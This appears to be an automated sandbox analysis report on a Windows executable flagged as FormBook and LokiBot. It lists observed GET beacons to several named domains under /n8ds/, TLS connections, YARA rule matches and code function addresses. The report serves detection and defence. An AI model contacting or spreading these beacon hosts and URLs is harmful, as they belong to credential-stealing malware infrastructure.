Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?2dfPiT=o6P8yX&6ldD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv9 HTTP/1.1Host: www.divorcefearfreedom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=BkWPMdYTTR0ZQmtbwmm8ayu+d1W65DpSRIKYH6pwPIESNdIBtEF9Jb3WD/+idhQ1krue&2dfPiT=o6P8yX HTTP/1.1Host: www.jamiecongedo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&v6Mt=3fxxA4Z HTTP/1.1Host: www.lopsrental.leaseConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown	HTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49841 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000019.00000000.50661482100.0000000040097000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000019.00000002.50719644805.0000000040097000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000000.50714091090.0000000040097000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.51929622698.0000000004887000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com

Source: Zr26f1rL6r.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000019.00000000.50661482100.0000000040097000.00000004.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000002.50719644805.0000000040097000.00000004.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000000.50714091090.0000000040097000.00000004.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.51929622698.0000000004887000.00000004.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_00401772	2_2_00401772
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_00401725	2_2_00401725
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_00401536	2_2_00401536
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02322AD2	2_2_02322AD2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02312386	2_2_02312386
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231C88B	2_2_0231C88B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_023206A2	2_2_023206A2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231523E	2_2_0231523E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0232322B	2_2_0232322B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02315814	2_2_02315814
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02311069	2_2_02311069
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02321161	2_2_02321161
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231CE0C	2_2_0231CE0C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02320754	2_2_02320754
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231FFED	2_2_0231FFED
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_023104A3	2_2_023104A3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02321490	2_2_02321490
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231A574	2_2_0231A574
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E980EAD	10_2_1E980EAD
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2	10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E989ED2	10_2_1E989ED2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C2EE8	10_2_1E8C2EE8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E912E48	10_2_1E912E48
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F0E50	10_2_1E8F0E50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D	10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98EFBF	10_2_1E98EFBF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E981FC6	10_2_1E981FC6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0	10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DCF00	10_2_1E8DCF00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98FF63	10_2_1E98FF63
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E969C98	10_2_1E969C98
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8E8CDF	10_2_1E8E8CDF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EFCE0	10_2_1E8EFCE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E99ACEB	10_2_1E99ACEB
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E957CE8	10_2_1E957CE8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C0C12	10_2_1E8C0C12
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DAC20	10_2_1E8DAC20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97EC4C	10_2_1E97EC4C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60	10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E986C69	10_2_1E986C69
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98EC60	10_2_1E98EC60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8E2DB0	10_2_1E8E2DB0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D9DD0	10_2_1E8D9DD0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4	10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CAD00	10_2_1E8CAD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98FD27	10_2_1E98FD27
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E987D4C	10_2_1E987D4C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0D69	10_2_1E8D0D69
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98FA89	10_2_1E98FA89
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EFAA0	10_2_1E8EFAA0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98CA13	10_2_1E98CA13
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98EA5B	10_2_1E98EA5B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E944BC0	10_2_1E944BC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E90DB19	10_2_1E90DB19
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0B10	10_2_1E8D0B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98FB2E	10_2_1E98FB2E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8E6882	10_2_1E8E6882
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E9498B2	10_2_1E9498B2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E9818DA	10_2_1E9818DA
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D28C0	10_2_1E8D28C0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E9878F3	10_2_1E9878F3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3800	10_2_1E8D3800
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FE810	10_2_1E8FE810
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970835	10_2_1E970835
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8B6868	10_2_1E8B6868
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E945870	10_2_1E945870
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98F872	10_2_1E98F872
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D9870	10_2_1E8D9870
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EB870	10_2_1E8EB870
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CE9A0	10_2_1E8CE9A0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98E9A6	10_2_1E98E9A6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E9159C0	10_2_1E9159C0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0680	10_2_1E8D0680
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98A6C0	10_2_1E98A6C0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CC6E0	10_2_1E8CC6E0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98F6F6	10_2_1E98F6F6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E9436EC	10_2_1E9436EC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EC600	10_2_1E8EC600
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96D62C	10_2_1E96D62C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97D646	10_2_1E97D646
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F4670	10_2_1E8F4670
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E986757	10_2_1E986757
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D2760	10_2_1E8D2760
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DA760	10_2_1E8DA760
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E93D480	10_2_1E93D480
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0445	10_2_1E8D0445
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98F5C9	10_2_1E98F5C9
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E9875C6	10_2_1E9875C6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E99A526	10_2_1E99A526
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BD2EC	10_2_1E8BD2EC
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98124C	10_2_1E98124C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C1380	10_2_1E8C1380
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DE310	10_2_1E8DE310
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98F330	10_2_1E98F330
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E90508C	10_2_1E90508C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C00A0	10_2_1E8C00A0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DB0D0	10_2_1E8DB0D0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E9870F1	10_2_1E9870F1
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97E076	10_2_1E97E076
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D51C0	10_2_1E8D51C0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EB1E0	10_2_1E8EB1E0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E99010E	10_2_1E99010E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BF113	10_2_1E8BF113
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96D130	10_2_1E96D130
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E91717A	10_2_1E91717A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04370445	15_2_04370445
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043DD480	15_2_043DD480
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0443A526	15_2_0443A526
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_044275C6	15_2_044275C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0442F5C9	15_2_0442F5C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0441D646	15_2_0441D646
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0438C600	15_2_0438C600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04394670	15_2_04394670
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0440D62C	15_2_0440D62C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0442A6C0	15_2_0442A6C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0442F6F6	15_2_0442F6F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04370680	15_2_04370680
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043E36EC	15_2_043E36EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0436C6E0	15_2_0436C6E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04426757	15_2_04426757
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04372760	15_2_04372760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0437A760	15_2_0437A760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0441E076	15_2_0441E076
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043600A0	15_2_043600A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_044270F1	15_2_044270F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A508C	15_2_043A508C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0437B0D0	15_2_0437B0D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0435F113	15_2_0435F113
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043B717A	15_2_043B717A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0443010E	15_2_0443010E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0440D130	15_2_0440D130
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0438B1E0	15_2_0438B1E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043751C0	15_2_043751C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0442124C	15_2_0442124C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0435D2EC	15_2_0435D2EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0437E310	15_2_0437E310
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0442F330	15_2_0442F330
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04361380	15_2_04361380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0441EC4C	15_2_0441EC4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0437AC20	15_2_0437AC20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0442EC60	15_2_0442EC60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04360C12	15_2_04360C12
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04426C69	15_2_04426C69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_04373C60	15_2_04373C60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0443ACEB	15_2_0443ACEB
